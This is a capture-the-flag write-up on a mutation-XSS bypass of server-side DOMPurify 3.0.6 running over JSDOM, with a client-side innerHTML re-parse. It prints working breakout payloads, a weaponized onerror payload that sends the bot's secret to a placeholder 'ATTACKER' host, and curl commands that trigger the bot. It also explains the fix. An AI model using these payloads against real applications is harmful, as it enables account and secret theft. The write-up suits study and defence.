pwneglyph logo
web javascript xss mxss dompurify jsdom parser-differential rawtext ssr-sanitization puppeteer-bot client-side cve-2024-47875

A publishing app sanitizes a hand-built DOM tree with DOMPurify over JSDOM and ships the serialized string to a browser that re-parses it. A <style> rawtext breakout, hidden from DOMPurify by an element child, turns a "safe" tree into live XSS that steals the editor bot's secret.

inkpress — mXSS via server-side DOMPurify + JSDOM reparse

CTF: Midnight Flag Finals 2026 · Category: Web · Stack: Node / Express, DOMPurify 3.0.6, JSDOM 23.0.1, puppeteer-core

Challenge overview

Inkpress is a small publishing platform. You compose a "story" out of structured blocks, preview it, publish it to a shareable URL /p/:id, and can ask the editorial desk (a headless Chromium bot) to read it. The bot holds an httpOnly session cookie and the flag is the app SECRET, returned only to that session by /api/account:

app.get('/api/account', (req, res) => {
  const cookies = parseCookies(req.headers.cookie);
  if (cookies.session && cookies.session === editorSession) {
    return res.json({ role: 'editor', name: 'Editorial desk', secret: SECRET });
  }
  res.status(401).json({ error: 'sign in required' });
});

So the goal is classic: get XSS in the bot's browser, then fetch('/api/account') and exfiltrate secret.

How content is built and rendered

You don't submit raw HTML. You submit a JSON tree of { tag, attrs, children } blocks, and the server walks it into a real DOM with buildNode, sanitizes the whole <article> with DOMPurify running on a JSDOM window, and stores the serialized string (server.js):

function buildNode(document, spec, depth) {
  if (depth > 64) throw new Error('document nesting too deep');
  if (typeof spec.text === 'string') return document.createTextNode(spec.text);
  const tag = String(spec.tag || '').toLowerCase();
  if (!/^[a-z][a-z0-9]*$/.test(tag)) throw new Error('invalid tag name');
  const el = document.createElement(tag);
  if (spec.attrs && typeof spec.attrs === 'object') {
    for (const key of Object.keys(spec.attrs)) {
      if (!/^[a-zA-Z_:][\w:.-]*$/.test(key)) continue;
      try { el.setAttribute(key, String(spec.attrs[key])); } catch (e) {}
    }
  }
  if (Array.isArray(spec.children))
    for (const child of spec.children) el.appendChild(buildNode(document, child, depth + 1));
  return el;
}

function renderDocument(tree) {
  const window = new JSDOM('').window;
  const document = window.document;
  const DOMPurify = createDOMPurify(window);
  const root = document.createElement('article');
  for (const node of nodes) root.appendChild(buildNode(document, node, 0));
  return DOMPurify.sanitize(root);     // returns a STRING (root.innerHTML), stored as post.html
}

The published page /p/:id then drops that stored string into the DOM in the browser:

const data = ${data};                                    // { title, html }
document.getElementById('post').innerHTML = data.html;   // <-- re-parsed by Chromium

That last line is the whole bug surface. DOMPurify only promises that the node tree it returns is safe — not that the string you get from serializing it is safe to feed to a different HTML parser.

The core insight: two HTML engines

Sanitization happens server-side in JSDOM; insertion happens client-side in Chromium. Two parsers touch the same bytes:

  1. JSDOM parses the tree and DOMPurify sanitizes it.
  2. JSDOM serializes the clean tree to a string (the innerHTML getter).
  3. Chromium re-parses that string via element.innerHTML.

mXSS (mutation XSS) lives in step 2→3. The HTML serialization spec has rules that are perfectly safe as long as nobody re-parses the output — and we do re-parse it.

The key rule: rawtext elements (style, script, textarea, title, xmp, noscript, iframe, noframes…) serialize their text content literally, without escaping. A </style> inside a <style> text node serializes as the raw bytes </style>, not &lt;/style&gt;. To JSDOM that's inert character data nested in a node. To Chromium re-parsing it, that </style> closes the element early and everything after becomes live markup.

Defeating DOMPurify's anti-mXSS gate

DOMPurify 3.0.6 has exactly one defense for this. In _sanitizeElements it force-removes an element whose children are text only but whose text looks like markup:

// purify.cjs.js (3.0.6)
if (currentNode.hasChildNodes()
    && !_isNode(currentNode.firstElementChild)   // no ELEMENT child
    && regExpTest(/<[/\w]/g, currentNode.innerHTML)
    && regExpTest(/<[/\w]/g, currentNode.textContent)) {
  _forceRemove(currentNode);                      // a text-only <style>...</style> gets killed
}

A <style> whose only child is our breakout text is removed. But the gate short-circuits the moment the element has an element child: firstElementChild becomes non-null, so !_isNode(currentNode.firstElementChild) is false and the entire condition fails.

Because the challenge lets us build the node tree by hand, we just give <style> two children:

  • a harmless element child (<br>) → firstElementChild is non-null → gate skipped, <style> survives;
  • a text child carrying </style><img ... onerror=...> → DOMPurify (default config, SAFE_FOR_TEMPLATES unset) never treats text inside a rawtext element as markup, so onerror is never seen, never stripped.

This element-child bypass is patched in DOMPurify 3.1+.

What each engine sees

DOMPurify walks this and calls it clean (text is opaque inside style):

article
└─ style
   ├─ #text  "</style><img src=1 onerror=alert(1)>"   ← opaque chars to JSDOM
   └─ br                                                ← makes firstElementChild non-null

JSDOM serializes the text node literally (rawtext rule):

<article><style></style><img src=1 onerror=alert(1)><br></style></article>

Chromium re-parses that string: the first </style> closes the style early, <img> becomes a real, live element, onerror fires.

Exploit

The JSON tree that proves XSS:

[
  {
    "tag": "style",
    "children": [
      { "text": "</style><img src=1 onerror=alert(1)>" },
      { "tag": "br" }
    ]
  }
]

Weaponized to steal the flag (keep the onerror body space-free so it stays a single unquoted attribute after reparse):

[
  {
    "tag": "style",
    "children": [
      { "text": "</style><img src=1 onerror=fetch('/api/account').then(r=>r.text()).then(s=>location='https://ATTACKER/?'+encodeURIComponent(s))>" },
      { "tag": "br" }
    ]
  }
]

Publish it, then request a review so the editor bot opens /p/:id (the bot dwells ~5s, plenty of time):

# 1) publish, capture the id
ID=$(curl -s http://TARGET/api/posts -H 'Content-Type: application/json' \
  -d '{"title":"x","tree":[{"tag":"style","children":[{"text":"</style><img src=1 onerror=fetch(`/api/account`).then(r=>r.text()).then(s=>location=`https://ATTACKER/?`+encodeURIComponent(s))>"},{"tag":"br"}]}]}' \
  | python3 -c 'import sys,json;print(json.load(sys.stdin)["id"])')

# 2) make the editor bot read it
curl -s http://TARGET/api/review -H 'Content-Type: application/json' -d "{\"id\":\"$ID\"}"

The bot loads the page, the re-parsed <img> fires onerror, fetch('/api/account') returns { ..., secret: FLAG }, and it's sent to your listener.

Why the "obvious" path was a dead end

The first instinct (and a lot of wasted time during the CTF) was the deep-nesting DOMPurify CVE (CVE-2024-47875) — wrapping <img> in ~500 <div> so the depth counter is bypassed. That doesn't apply here: the app caps depth at 64 and rejects malformed tags, and more importantly the real bug isn't a CVE at all — it's a serialization/reparse mXSS that exists by design when you sanitize server-side and re-parse client-side. The fix would be to either run DOMPurify in the browser and insert via RETURN_DOM_FRAGMENT + replaceChildren (so the string is never re-parsed), or upgrade DOMPurify and not trust serialized output across parser boundaries.

Takeaways (generalized technique)

  • DOMPurify.sanitize(x) returning a string that is later fed to another HTML parser is an mXSS smell. The guarantee is about nodes, not strings.
  • Server-side sanitization (JSDOM) + client-side innerHTML = two engines = a gap.
  • Rawtext elements (style, textarea, title, xmp, noscript, iframe, noframes) serialize inner text unescaped — prime breakout vectors.
  • On DOMPurify ≤ 3.0.x, give a rawtext element an element child (<br>) to skip the firstElementChild anti-mXSS gate.
  • Safe usage: DOMPurify.sanitize(dirty, { RETURN_DOM_FRAGMENT: true }) then replaceChildren(frag) — no re-parse, no gap.

Sources & references